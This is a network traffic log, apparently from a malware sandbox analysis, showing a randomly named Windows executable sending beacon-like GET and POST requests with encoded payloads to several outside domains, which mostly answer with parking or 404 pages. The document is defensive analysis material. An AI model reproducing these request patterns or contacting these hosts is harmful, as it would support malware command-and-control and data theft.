                                x-request-id: 8a32c0d7-070b-412c-880a-6d5e75c42955
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==
                                set-cookie: parking_session=8a32c0d7-070b-412c-880a-6d5e75c42955; expires=Mon, 23 Sep 2024 12:54:19 GMT; path=/
                                connection: close
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VTCD/NI5TGOPdEnQukIDh5BP/Tnds/IDJVMRXEnZ8X/1m8/f8AOUkV5RZCD9pajtSQBYvU1xd0vO3z7RVsKy3A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                Timestamp: Sep 23, 2024 14:39:19.083887100 CEST | Bytes transferred: 603 | Direction: IN
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGEzMmMwZDctMDcwYi00MTJjLTg4MGEtNmQ1ZTc1YzQyOTU1IiwicGFnZV90aW1lIjoxNzI3MDk1MT


                                Session ID: 36 | Source IP: 192.168.2.7 | Source Port: 49740 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 3040 | Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:39:21.172652960 CEST | Bytes transferred: 486 | Direction: OUT | Data: GET /8dtf/?76=n4Dn6BhRGXgBCc8VvzeMEOXmG0Elz5lGLePoshfoMkwgvj9XBMT8fCSzJRDbu+yD5cpoNGctvaCBzFD7eo0ZE+1Jdoxfd5POcRUtDqQJ70nv82NNqRSJamvbeDYUZbHlz6Y0RwscVapw&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.donante-de-ovulos.biz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Timestamp: Sep 23, 2024 14:39:21.619105101 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
                                date: Mon, 23 Sep 2024 12:39:21 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1514
                                x-request-id: 2272f143-d394-4c2c-885c-7b7065c73d99
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vObKN4LyiXLUjm+BK+jqgSa5aSzKRzCEpGGuyHiZr4t1/KUPb9U6Qp6AplDofR1gMf2QqvqZ8dtWPMEg/0DZ/Q==
                                set-cookie: parking_session=2272f143-d394-4c2c-885c-7b7065c73d99; expires=Mon, 23 Sep 2024 12:54:21 GMT; path=/
                                connection: close
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vObKN4LyiXLUjm+BK+jqgSa5aSzKRzCEpGGuyHiZr4t1/KUPb9U6Qp6AplDofR1gMf2QqvqZ8dtWPMEg/0DZ/Q==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                Timestamp: Sep 23, 2024 14:39:21.619121075 CEST | Bytes transferred: 967 | Direction: IN
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjI3MmYxNDMtZDM5NC00YzJjLTg4NWMtN2I3MDY1YzczZDk5IiwicGFnZV90aW1lIjoxNzI3MDk1MT


                                Session ID: 37 | Source IP: 192.168.2.7 | Source Port: 49741 | Destination IP: 62.149.128.40 | Destination Port: 80 | PID: 3040 | Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:39:26.701318979 CEST | Bytes transferred: 755 | Direction: OUT | Data: POST /uesf/ HTTP/1.1
                                Host: www.chalet-tofane.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.chalet-tofane.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.chalet-tofane.net/uesf/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Ascii: 76=+6hhgRl+aB29mDRKzCg8hwx9F1OXiJpCE9dQDgNIIyD6RG4DnEhDnL4u0GGr+dkxKaB9ptZ7oW+ajGalxVhkiawMCW3g8ynk9VcapLi9kV9e4ENxI5SBmZytj3OfBI0VaMT7eo03ALg7d2mZBmpH/0DS2//fOH+wD8TirdRTVjB7W+Kjf/RNp6T/PEVcJeg0wqyZLP3EYjkvuu/fOA==
                                Timestamp: Sep 23, 2024 14:39:27.378319025 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                Cache-Control: private
                                Content-Type: text/html; charset=utf-8
                                Server: Microsoft-IIS/10.0
                                X-Powered-By: ASP.NET
                                Date: Mon, 23 Sep 2024 12:39:27 GMT
                                Connection: close
                                Content-Length: 4953
                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                Timestamp: Sep 23, 2024 14:39:27.378333092 CEST | Bytes transferred: 1236 | Direction: IN
                                Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                Timestamp: Sep 23, 2024 14:39:27.378353119 CEST | Bytes transferred: 448 | Direction: IN
                                Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                Timestamp: Sep 23, 2024 14:39:27.378359079 CEST | Bytes transferred: 1236 | Direction: IN
                                Data Ascii: es:</h4> <ul> <li>The directory or file specified does not exist on the Web server.</li> <li>The URL contains a typographical error.</li> <li>A custom filter or module, such as URLScan, restricts access to the file.</li> </ul> </fields
                                Timestamp: Sep 23, 2024 14:39:27.378366947 CEST | Bytes transferred: 1016 | Direction: IN
                                Data Ascii: details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>&nbsp;&nbsp;&nbsp;http://www.chalet-tofane.net:80/uesf/</td></tr> <tr><th>Physical Path</th><td>&nbsp;&nbsp;&nbsp;D:\ine


                                Session ID: 38 | Source IP: 192.168.2.7 | Source Port: 49742 | Destination IP: 62.149.128.40 | Destination Port: 80 | PID: 3040 | Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:39:29.251688004 CEST | Bytes transferred: 775 | Direction: OUT | Data: POST /uesf/ HTTP/1.1
                                Host: www.chalet-tofane.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.chalet-tofane.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.chalet-tofane.net/uesf/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Ascii: 76=+6hhgRl+aB29mjhK/FM82Ax+blOXoppOE9BQDhZYIAn6RmoDmGZDrr4u8mGujNkqKaMCppZ7oSWajHqlxm5nkKxqK23mhink9VcapKHakVle43VxaISAlZysrXOfFI0ZaMTjessdAJo7d3WZBXpGokDUpv+cLlXbZObBp7RqSBNweoXBFddh3rrELGxqe49Byr2BGtDlHUBFj8ebY6ISvTWyd74WpJL0aQnWHiA=
                                Timestamp: Sep 23, 2024 14:39:29.906673908 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                Cache-Control: private
                                Content-Type: text/html; charset=utf-8
                                Server: Microsoft-IIS/10.0
                                X-Powered-By: ASP.NET
                                Date: Mon, 23 Sep 2024 12:39:29 GMT
                                Connection: close
                                Content-Length: 4953
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                 Sep 23, 2024 14:39:29.906691074 CEST | 1236 | IN | Data Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                 Sep 23, 2024 14:39:29.906694889 CEST | 1236 | IN | Data Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                 Sep 23, 2024 14:39:29.906776905 CEST | 1236 | IN | Data Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                                Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                 Sep 23, 2024 14:39:29.906783104 CEST | 228 | IN | Data Raw: 64 69 72 65 63 74 6f 72 79 20 61 6e 64 20 74 72 79 20 74 68 65 20 72 65 71 75 65 73 74 20 61 67 61 69 6e 2e 20 0a 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e
                                Data Ascii: directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 39 | 192.168.2.7 | 49743 | 62.149.128.40 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Sep 23, 2024 14:39:31.799983025 CEST | 1788 | OUT | POST /uesf/ HTTP/1.1
                                Host: www.chalet-tofane.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.chalet-tofane.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.chalet-tofane.net/uesf/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 2b 36 68 68 67 52 6c 2b 61 42 32 39 6d 6a 68 4b 2f 46 4d 38 32 41 78 2b 62 6c 4f 58 6f 70 70 4f 45 39 42 51 44 68 5a 59 49 41 76 36 57 55 51 44 6d 68 31 44 71 72 34 75 67 32 47 76 6a 4e 6b 72 4b 61 55 47 70 70 64 42 6f 51 75 61 6c 56 69 6c 67 6e 35 6e 74 4b 78 71 47 57 33 6e 38 79 6d 2b 39 56 4d 57 70 4b 58 61 6b 56 6c 65 34 79 5a 78 5a 5a 53 41 70 35 79 74 6a 33 4f 54 42 49 30 31 61 49 2f 64 65 73 67 6e 48 39 6b 37 64 58 47 5a 44 46 52 47 72 45 44 57 71 76 2b 2b 4c 6c 4c 45 5a 4f 48 4e 70 37 4d 50 53 42 31 77 4f 63 43 4c 65 66 4a 71 6b 4b 54 4c 43 6d 78 6d 57 4f 30 79 79 62 72 6e 41 39 6a 68 48 55 56 78 72 39 62 55 4d 36 56 33 7a 7a 75 6d 53 49 6f 68 6d 4d 61 54 5a 77 2f 6c 66 45 34 44 7a 63 45 4f 71 4b 6c 62 79 38 35 4c 4f 4e 61 4a 6d 49 41 54 69 54 6d 65 36 57 44 33 47 6d 52 71 39 59 74 71 53 43 59 35 45 71 46 32 42 31 41 31 51 35 52 78 48 4b 53 43 35 64 62 35 4d 54 37 6b 5a 64 6e 62 53 39 58 46 4b 42 48 6e 34 7a 4c 53 66 79 6f 6d 5a 6c 36 4b 64 35 33 74 79 75 49 62 41 79 34 78 67 50 34 [TRUNCATED]
                                Data Ascii: 76=+6hhgRl+aB29mjhK/FM82Ax+blOXoppOE9BQDhZYIAv6WUQDmh1Dqr4ug2GvjNkrKaUGppdBoQualVilgn5ntKxqGW3n8ym+9VMWpKXakVle4yZxZZSAp5ytj3OTBI01aI/desgnH9k7dXGZDFRGrEDWqv++LlLEZOHNp7MPSB1wOcCLefJqkKTLCmxmWO0yybrnA9jhHUVxr9bUM6V3zzumSIohmMaTZw/lfE4DzcEOqKlby85LONaJmIATiTme6WD3GmRq9YtqSCY5EqF2B1A1Q5RxHKSC5db5MT7kZdnbS9XFKBHn4zLSfyomZl6Kd53tyuIbAy4xgP43dHykAHU6T0oM++L+Mavcx2uqQGubjSrcNyfJLgaJARapo/WQq+f64S55m8kLUCUOQ42PUNnk5kJzDy/Bwyel53n4hZYXwoFBeGhzRD+g3ICSptgoSucqzjFSIiQwQ8jjnvguLbXCKv0zdnq67p0Su1IQ7zHMMTBpMnnqPv7Bmrn5yQjmQK7rzSF4sIYGSSxsKMgGVIE+5BTD1IeGUSM0ygXG/OZ8vYQ23NwFFYuDg8ZSngcgaPbF4beUthzIb8mbmRE2YjiVJ1BauXuOSrkapLlamPgTZtklOTWDodifRsg+eASAnPojiFPUS2kSDY9zzbR9k88IbmHMGaVVNnCsIUNsbZSdCe7MOk7eUXnprkb0h8yPDPvjIEXM8i5tvmcYxLDQ83XM7hOtghYu5D88XkRoAhMXVdEXQonWgX8wpk7dMWC9xjz+WR2l9r7fGSA9h5p9eL+u9ybawH+1FiRlzuw3zF3ek2LjqUqJ2dYICOmGvGQtaVzof+NnJF0KV6OIvPVVqxgbwhIcB7Fle7ihw0DFjq+mssHT7d9TrDtvFN4gbTqFoIqxT+TOerCpI+ArAvlVz9sPmiBS0U6vG4QVcfhy3fu5vdc4ByhZO3sYpWxv18OjlY+jJlMwpN8zRndfmnvEk7hAO583YgdryVqA372f3roCOB4Nw [TRUNCATED]
                                 Sep 23, 2024 14:39:32.458868027 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Cache-Control: private
                                Content-Type: text/html; charset=utf-8
                                Server: Microsoft-IIS/10.0
                                X-Powered-By: ASP.NET
                                Date: Mon, 23 Sep 2024 12:39:32 GMT
                                Connection: close
                                Content-Length: 4953
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                 Sep 23, 2024 14:39:32.458894968 CEST | 1236 | IN | Data Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                 Sep 23, 2024 14:39:32.458914042 CEST | 448 | IN | Data Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                 Sep 23, 2024 14:39:32.458934069 CEST | 1236 | IN | Data Raw: 65 73 3a 3c 2f 68 34 3e 20 0a 20 20 3c 75 6c 3e 20 09 3c 6c 69 3e 54 68 65 20 64 69 72 65 63 74 6f 72 79 20 6f 72 20 66 69 6c 65 20 73 70 65 63 69 66 69 65 64 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 20 6f 6e 20 74 68 65 20 57 65 62 20 73 65
                                Data Ascii: es:</h4> <ul> <li>The directory or file specified does not exist on the Web server.</li> <li>The URL contains a typographical error.</li> <li>A custom filter or module, such as URLScan, restricts access to the file.</li> </ul> </fields
                                 Sep 23, 2024 14:39:32.458947897 CEST | 224 | IN | Data Raw: 64 65 74 61 69 6c 73 2d 72 69 67 68 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c
                                Data Ascii: details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>&nbsp;&nbsp;&nbsp;http://www.chalet-tofane.net:80/uesf/</td></tr> <tr><th>Physical Path</th><td>&nbsp
                                 Sep 23, 2024 14:39:32.458952904 CEST | 792 | IN | Data Raw: 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 44 3a 5c 69 6e 65 74 70 75 62 5c 77 77 77 72 6f 6f 74 5c 75 65 73 66 5c 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68 3e 4c 6f 67 6f 6e 20 4d 65 74
                                Data Ascii: ;&nbsp;&nbsp;D:\inetpub\wwwroot\uesf\</td></tr> <tr class="alt"><th>Logon Method</th><td>&nbsp;&nbsp;&nbsp;Anonymous</td></tr> <tr><th>Logon User</th><td>&nbsp;&nbsp;&nbsp;Anonymous</td></tr> <tr class="alt"><th>Request Tracing


                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 40 | 192.168.2.7 | 49744 | 62.149.128.40 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Sep 23, 2024 14:39:34.409079075 CEST | 482 | OUT | GET /uesf/?76=z4JBjkhdawOvrgQ3/n9w4VhuG3+mvNpQWeVdJRkYJDu2YFtbuhkNmpkohWu/kto2VaQ1uMJYrSrWzkHi22xejudxEXfvpm+SoyIUt5G98Vt9xyNVSrHPgcfLvBC9CdBqRcbgarcrONxp&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.chalet-tofane.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                 Sep 23, 2024 14:39:35.074392080 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Cache-Control: private
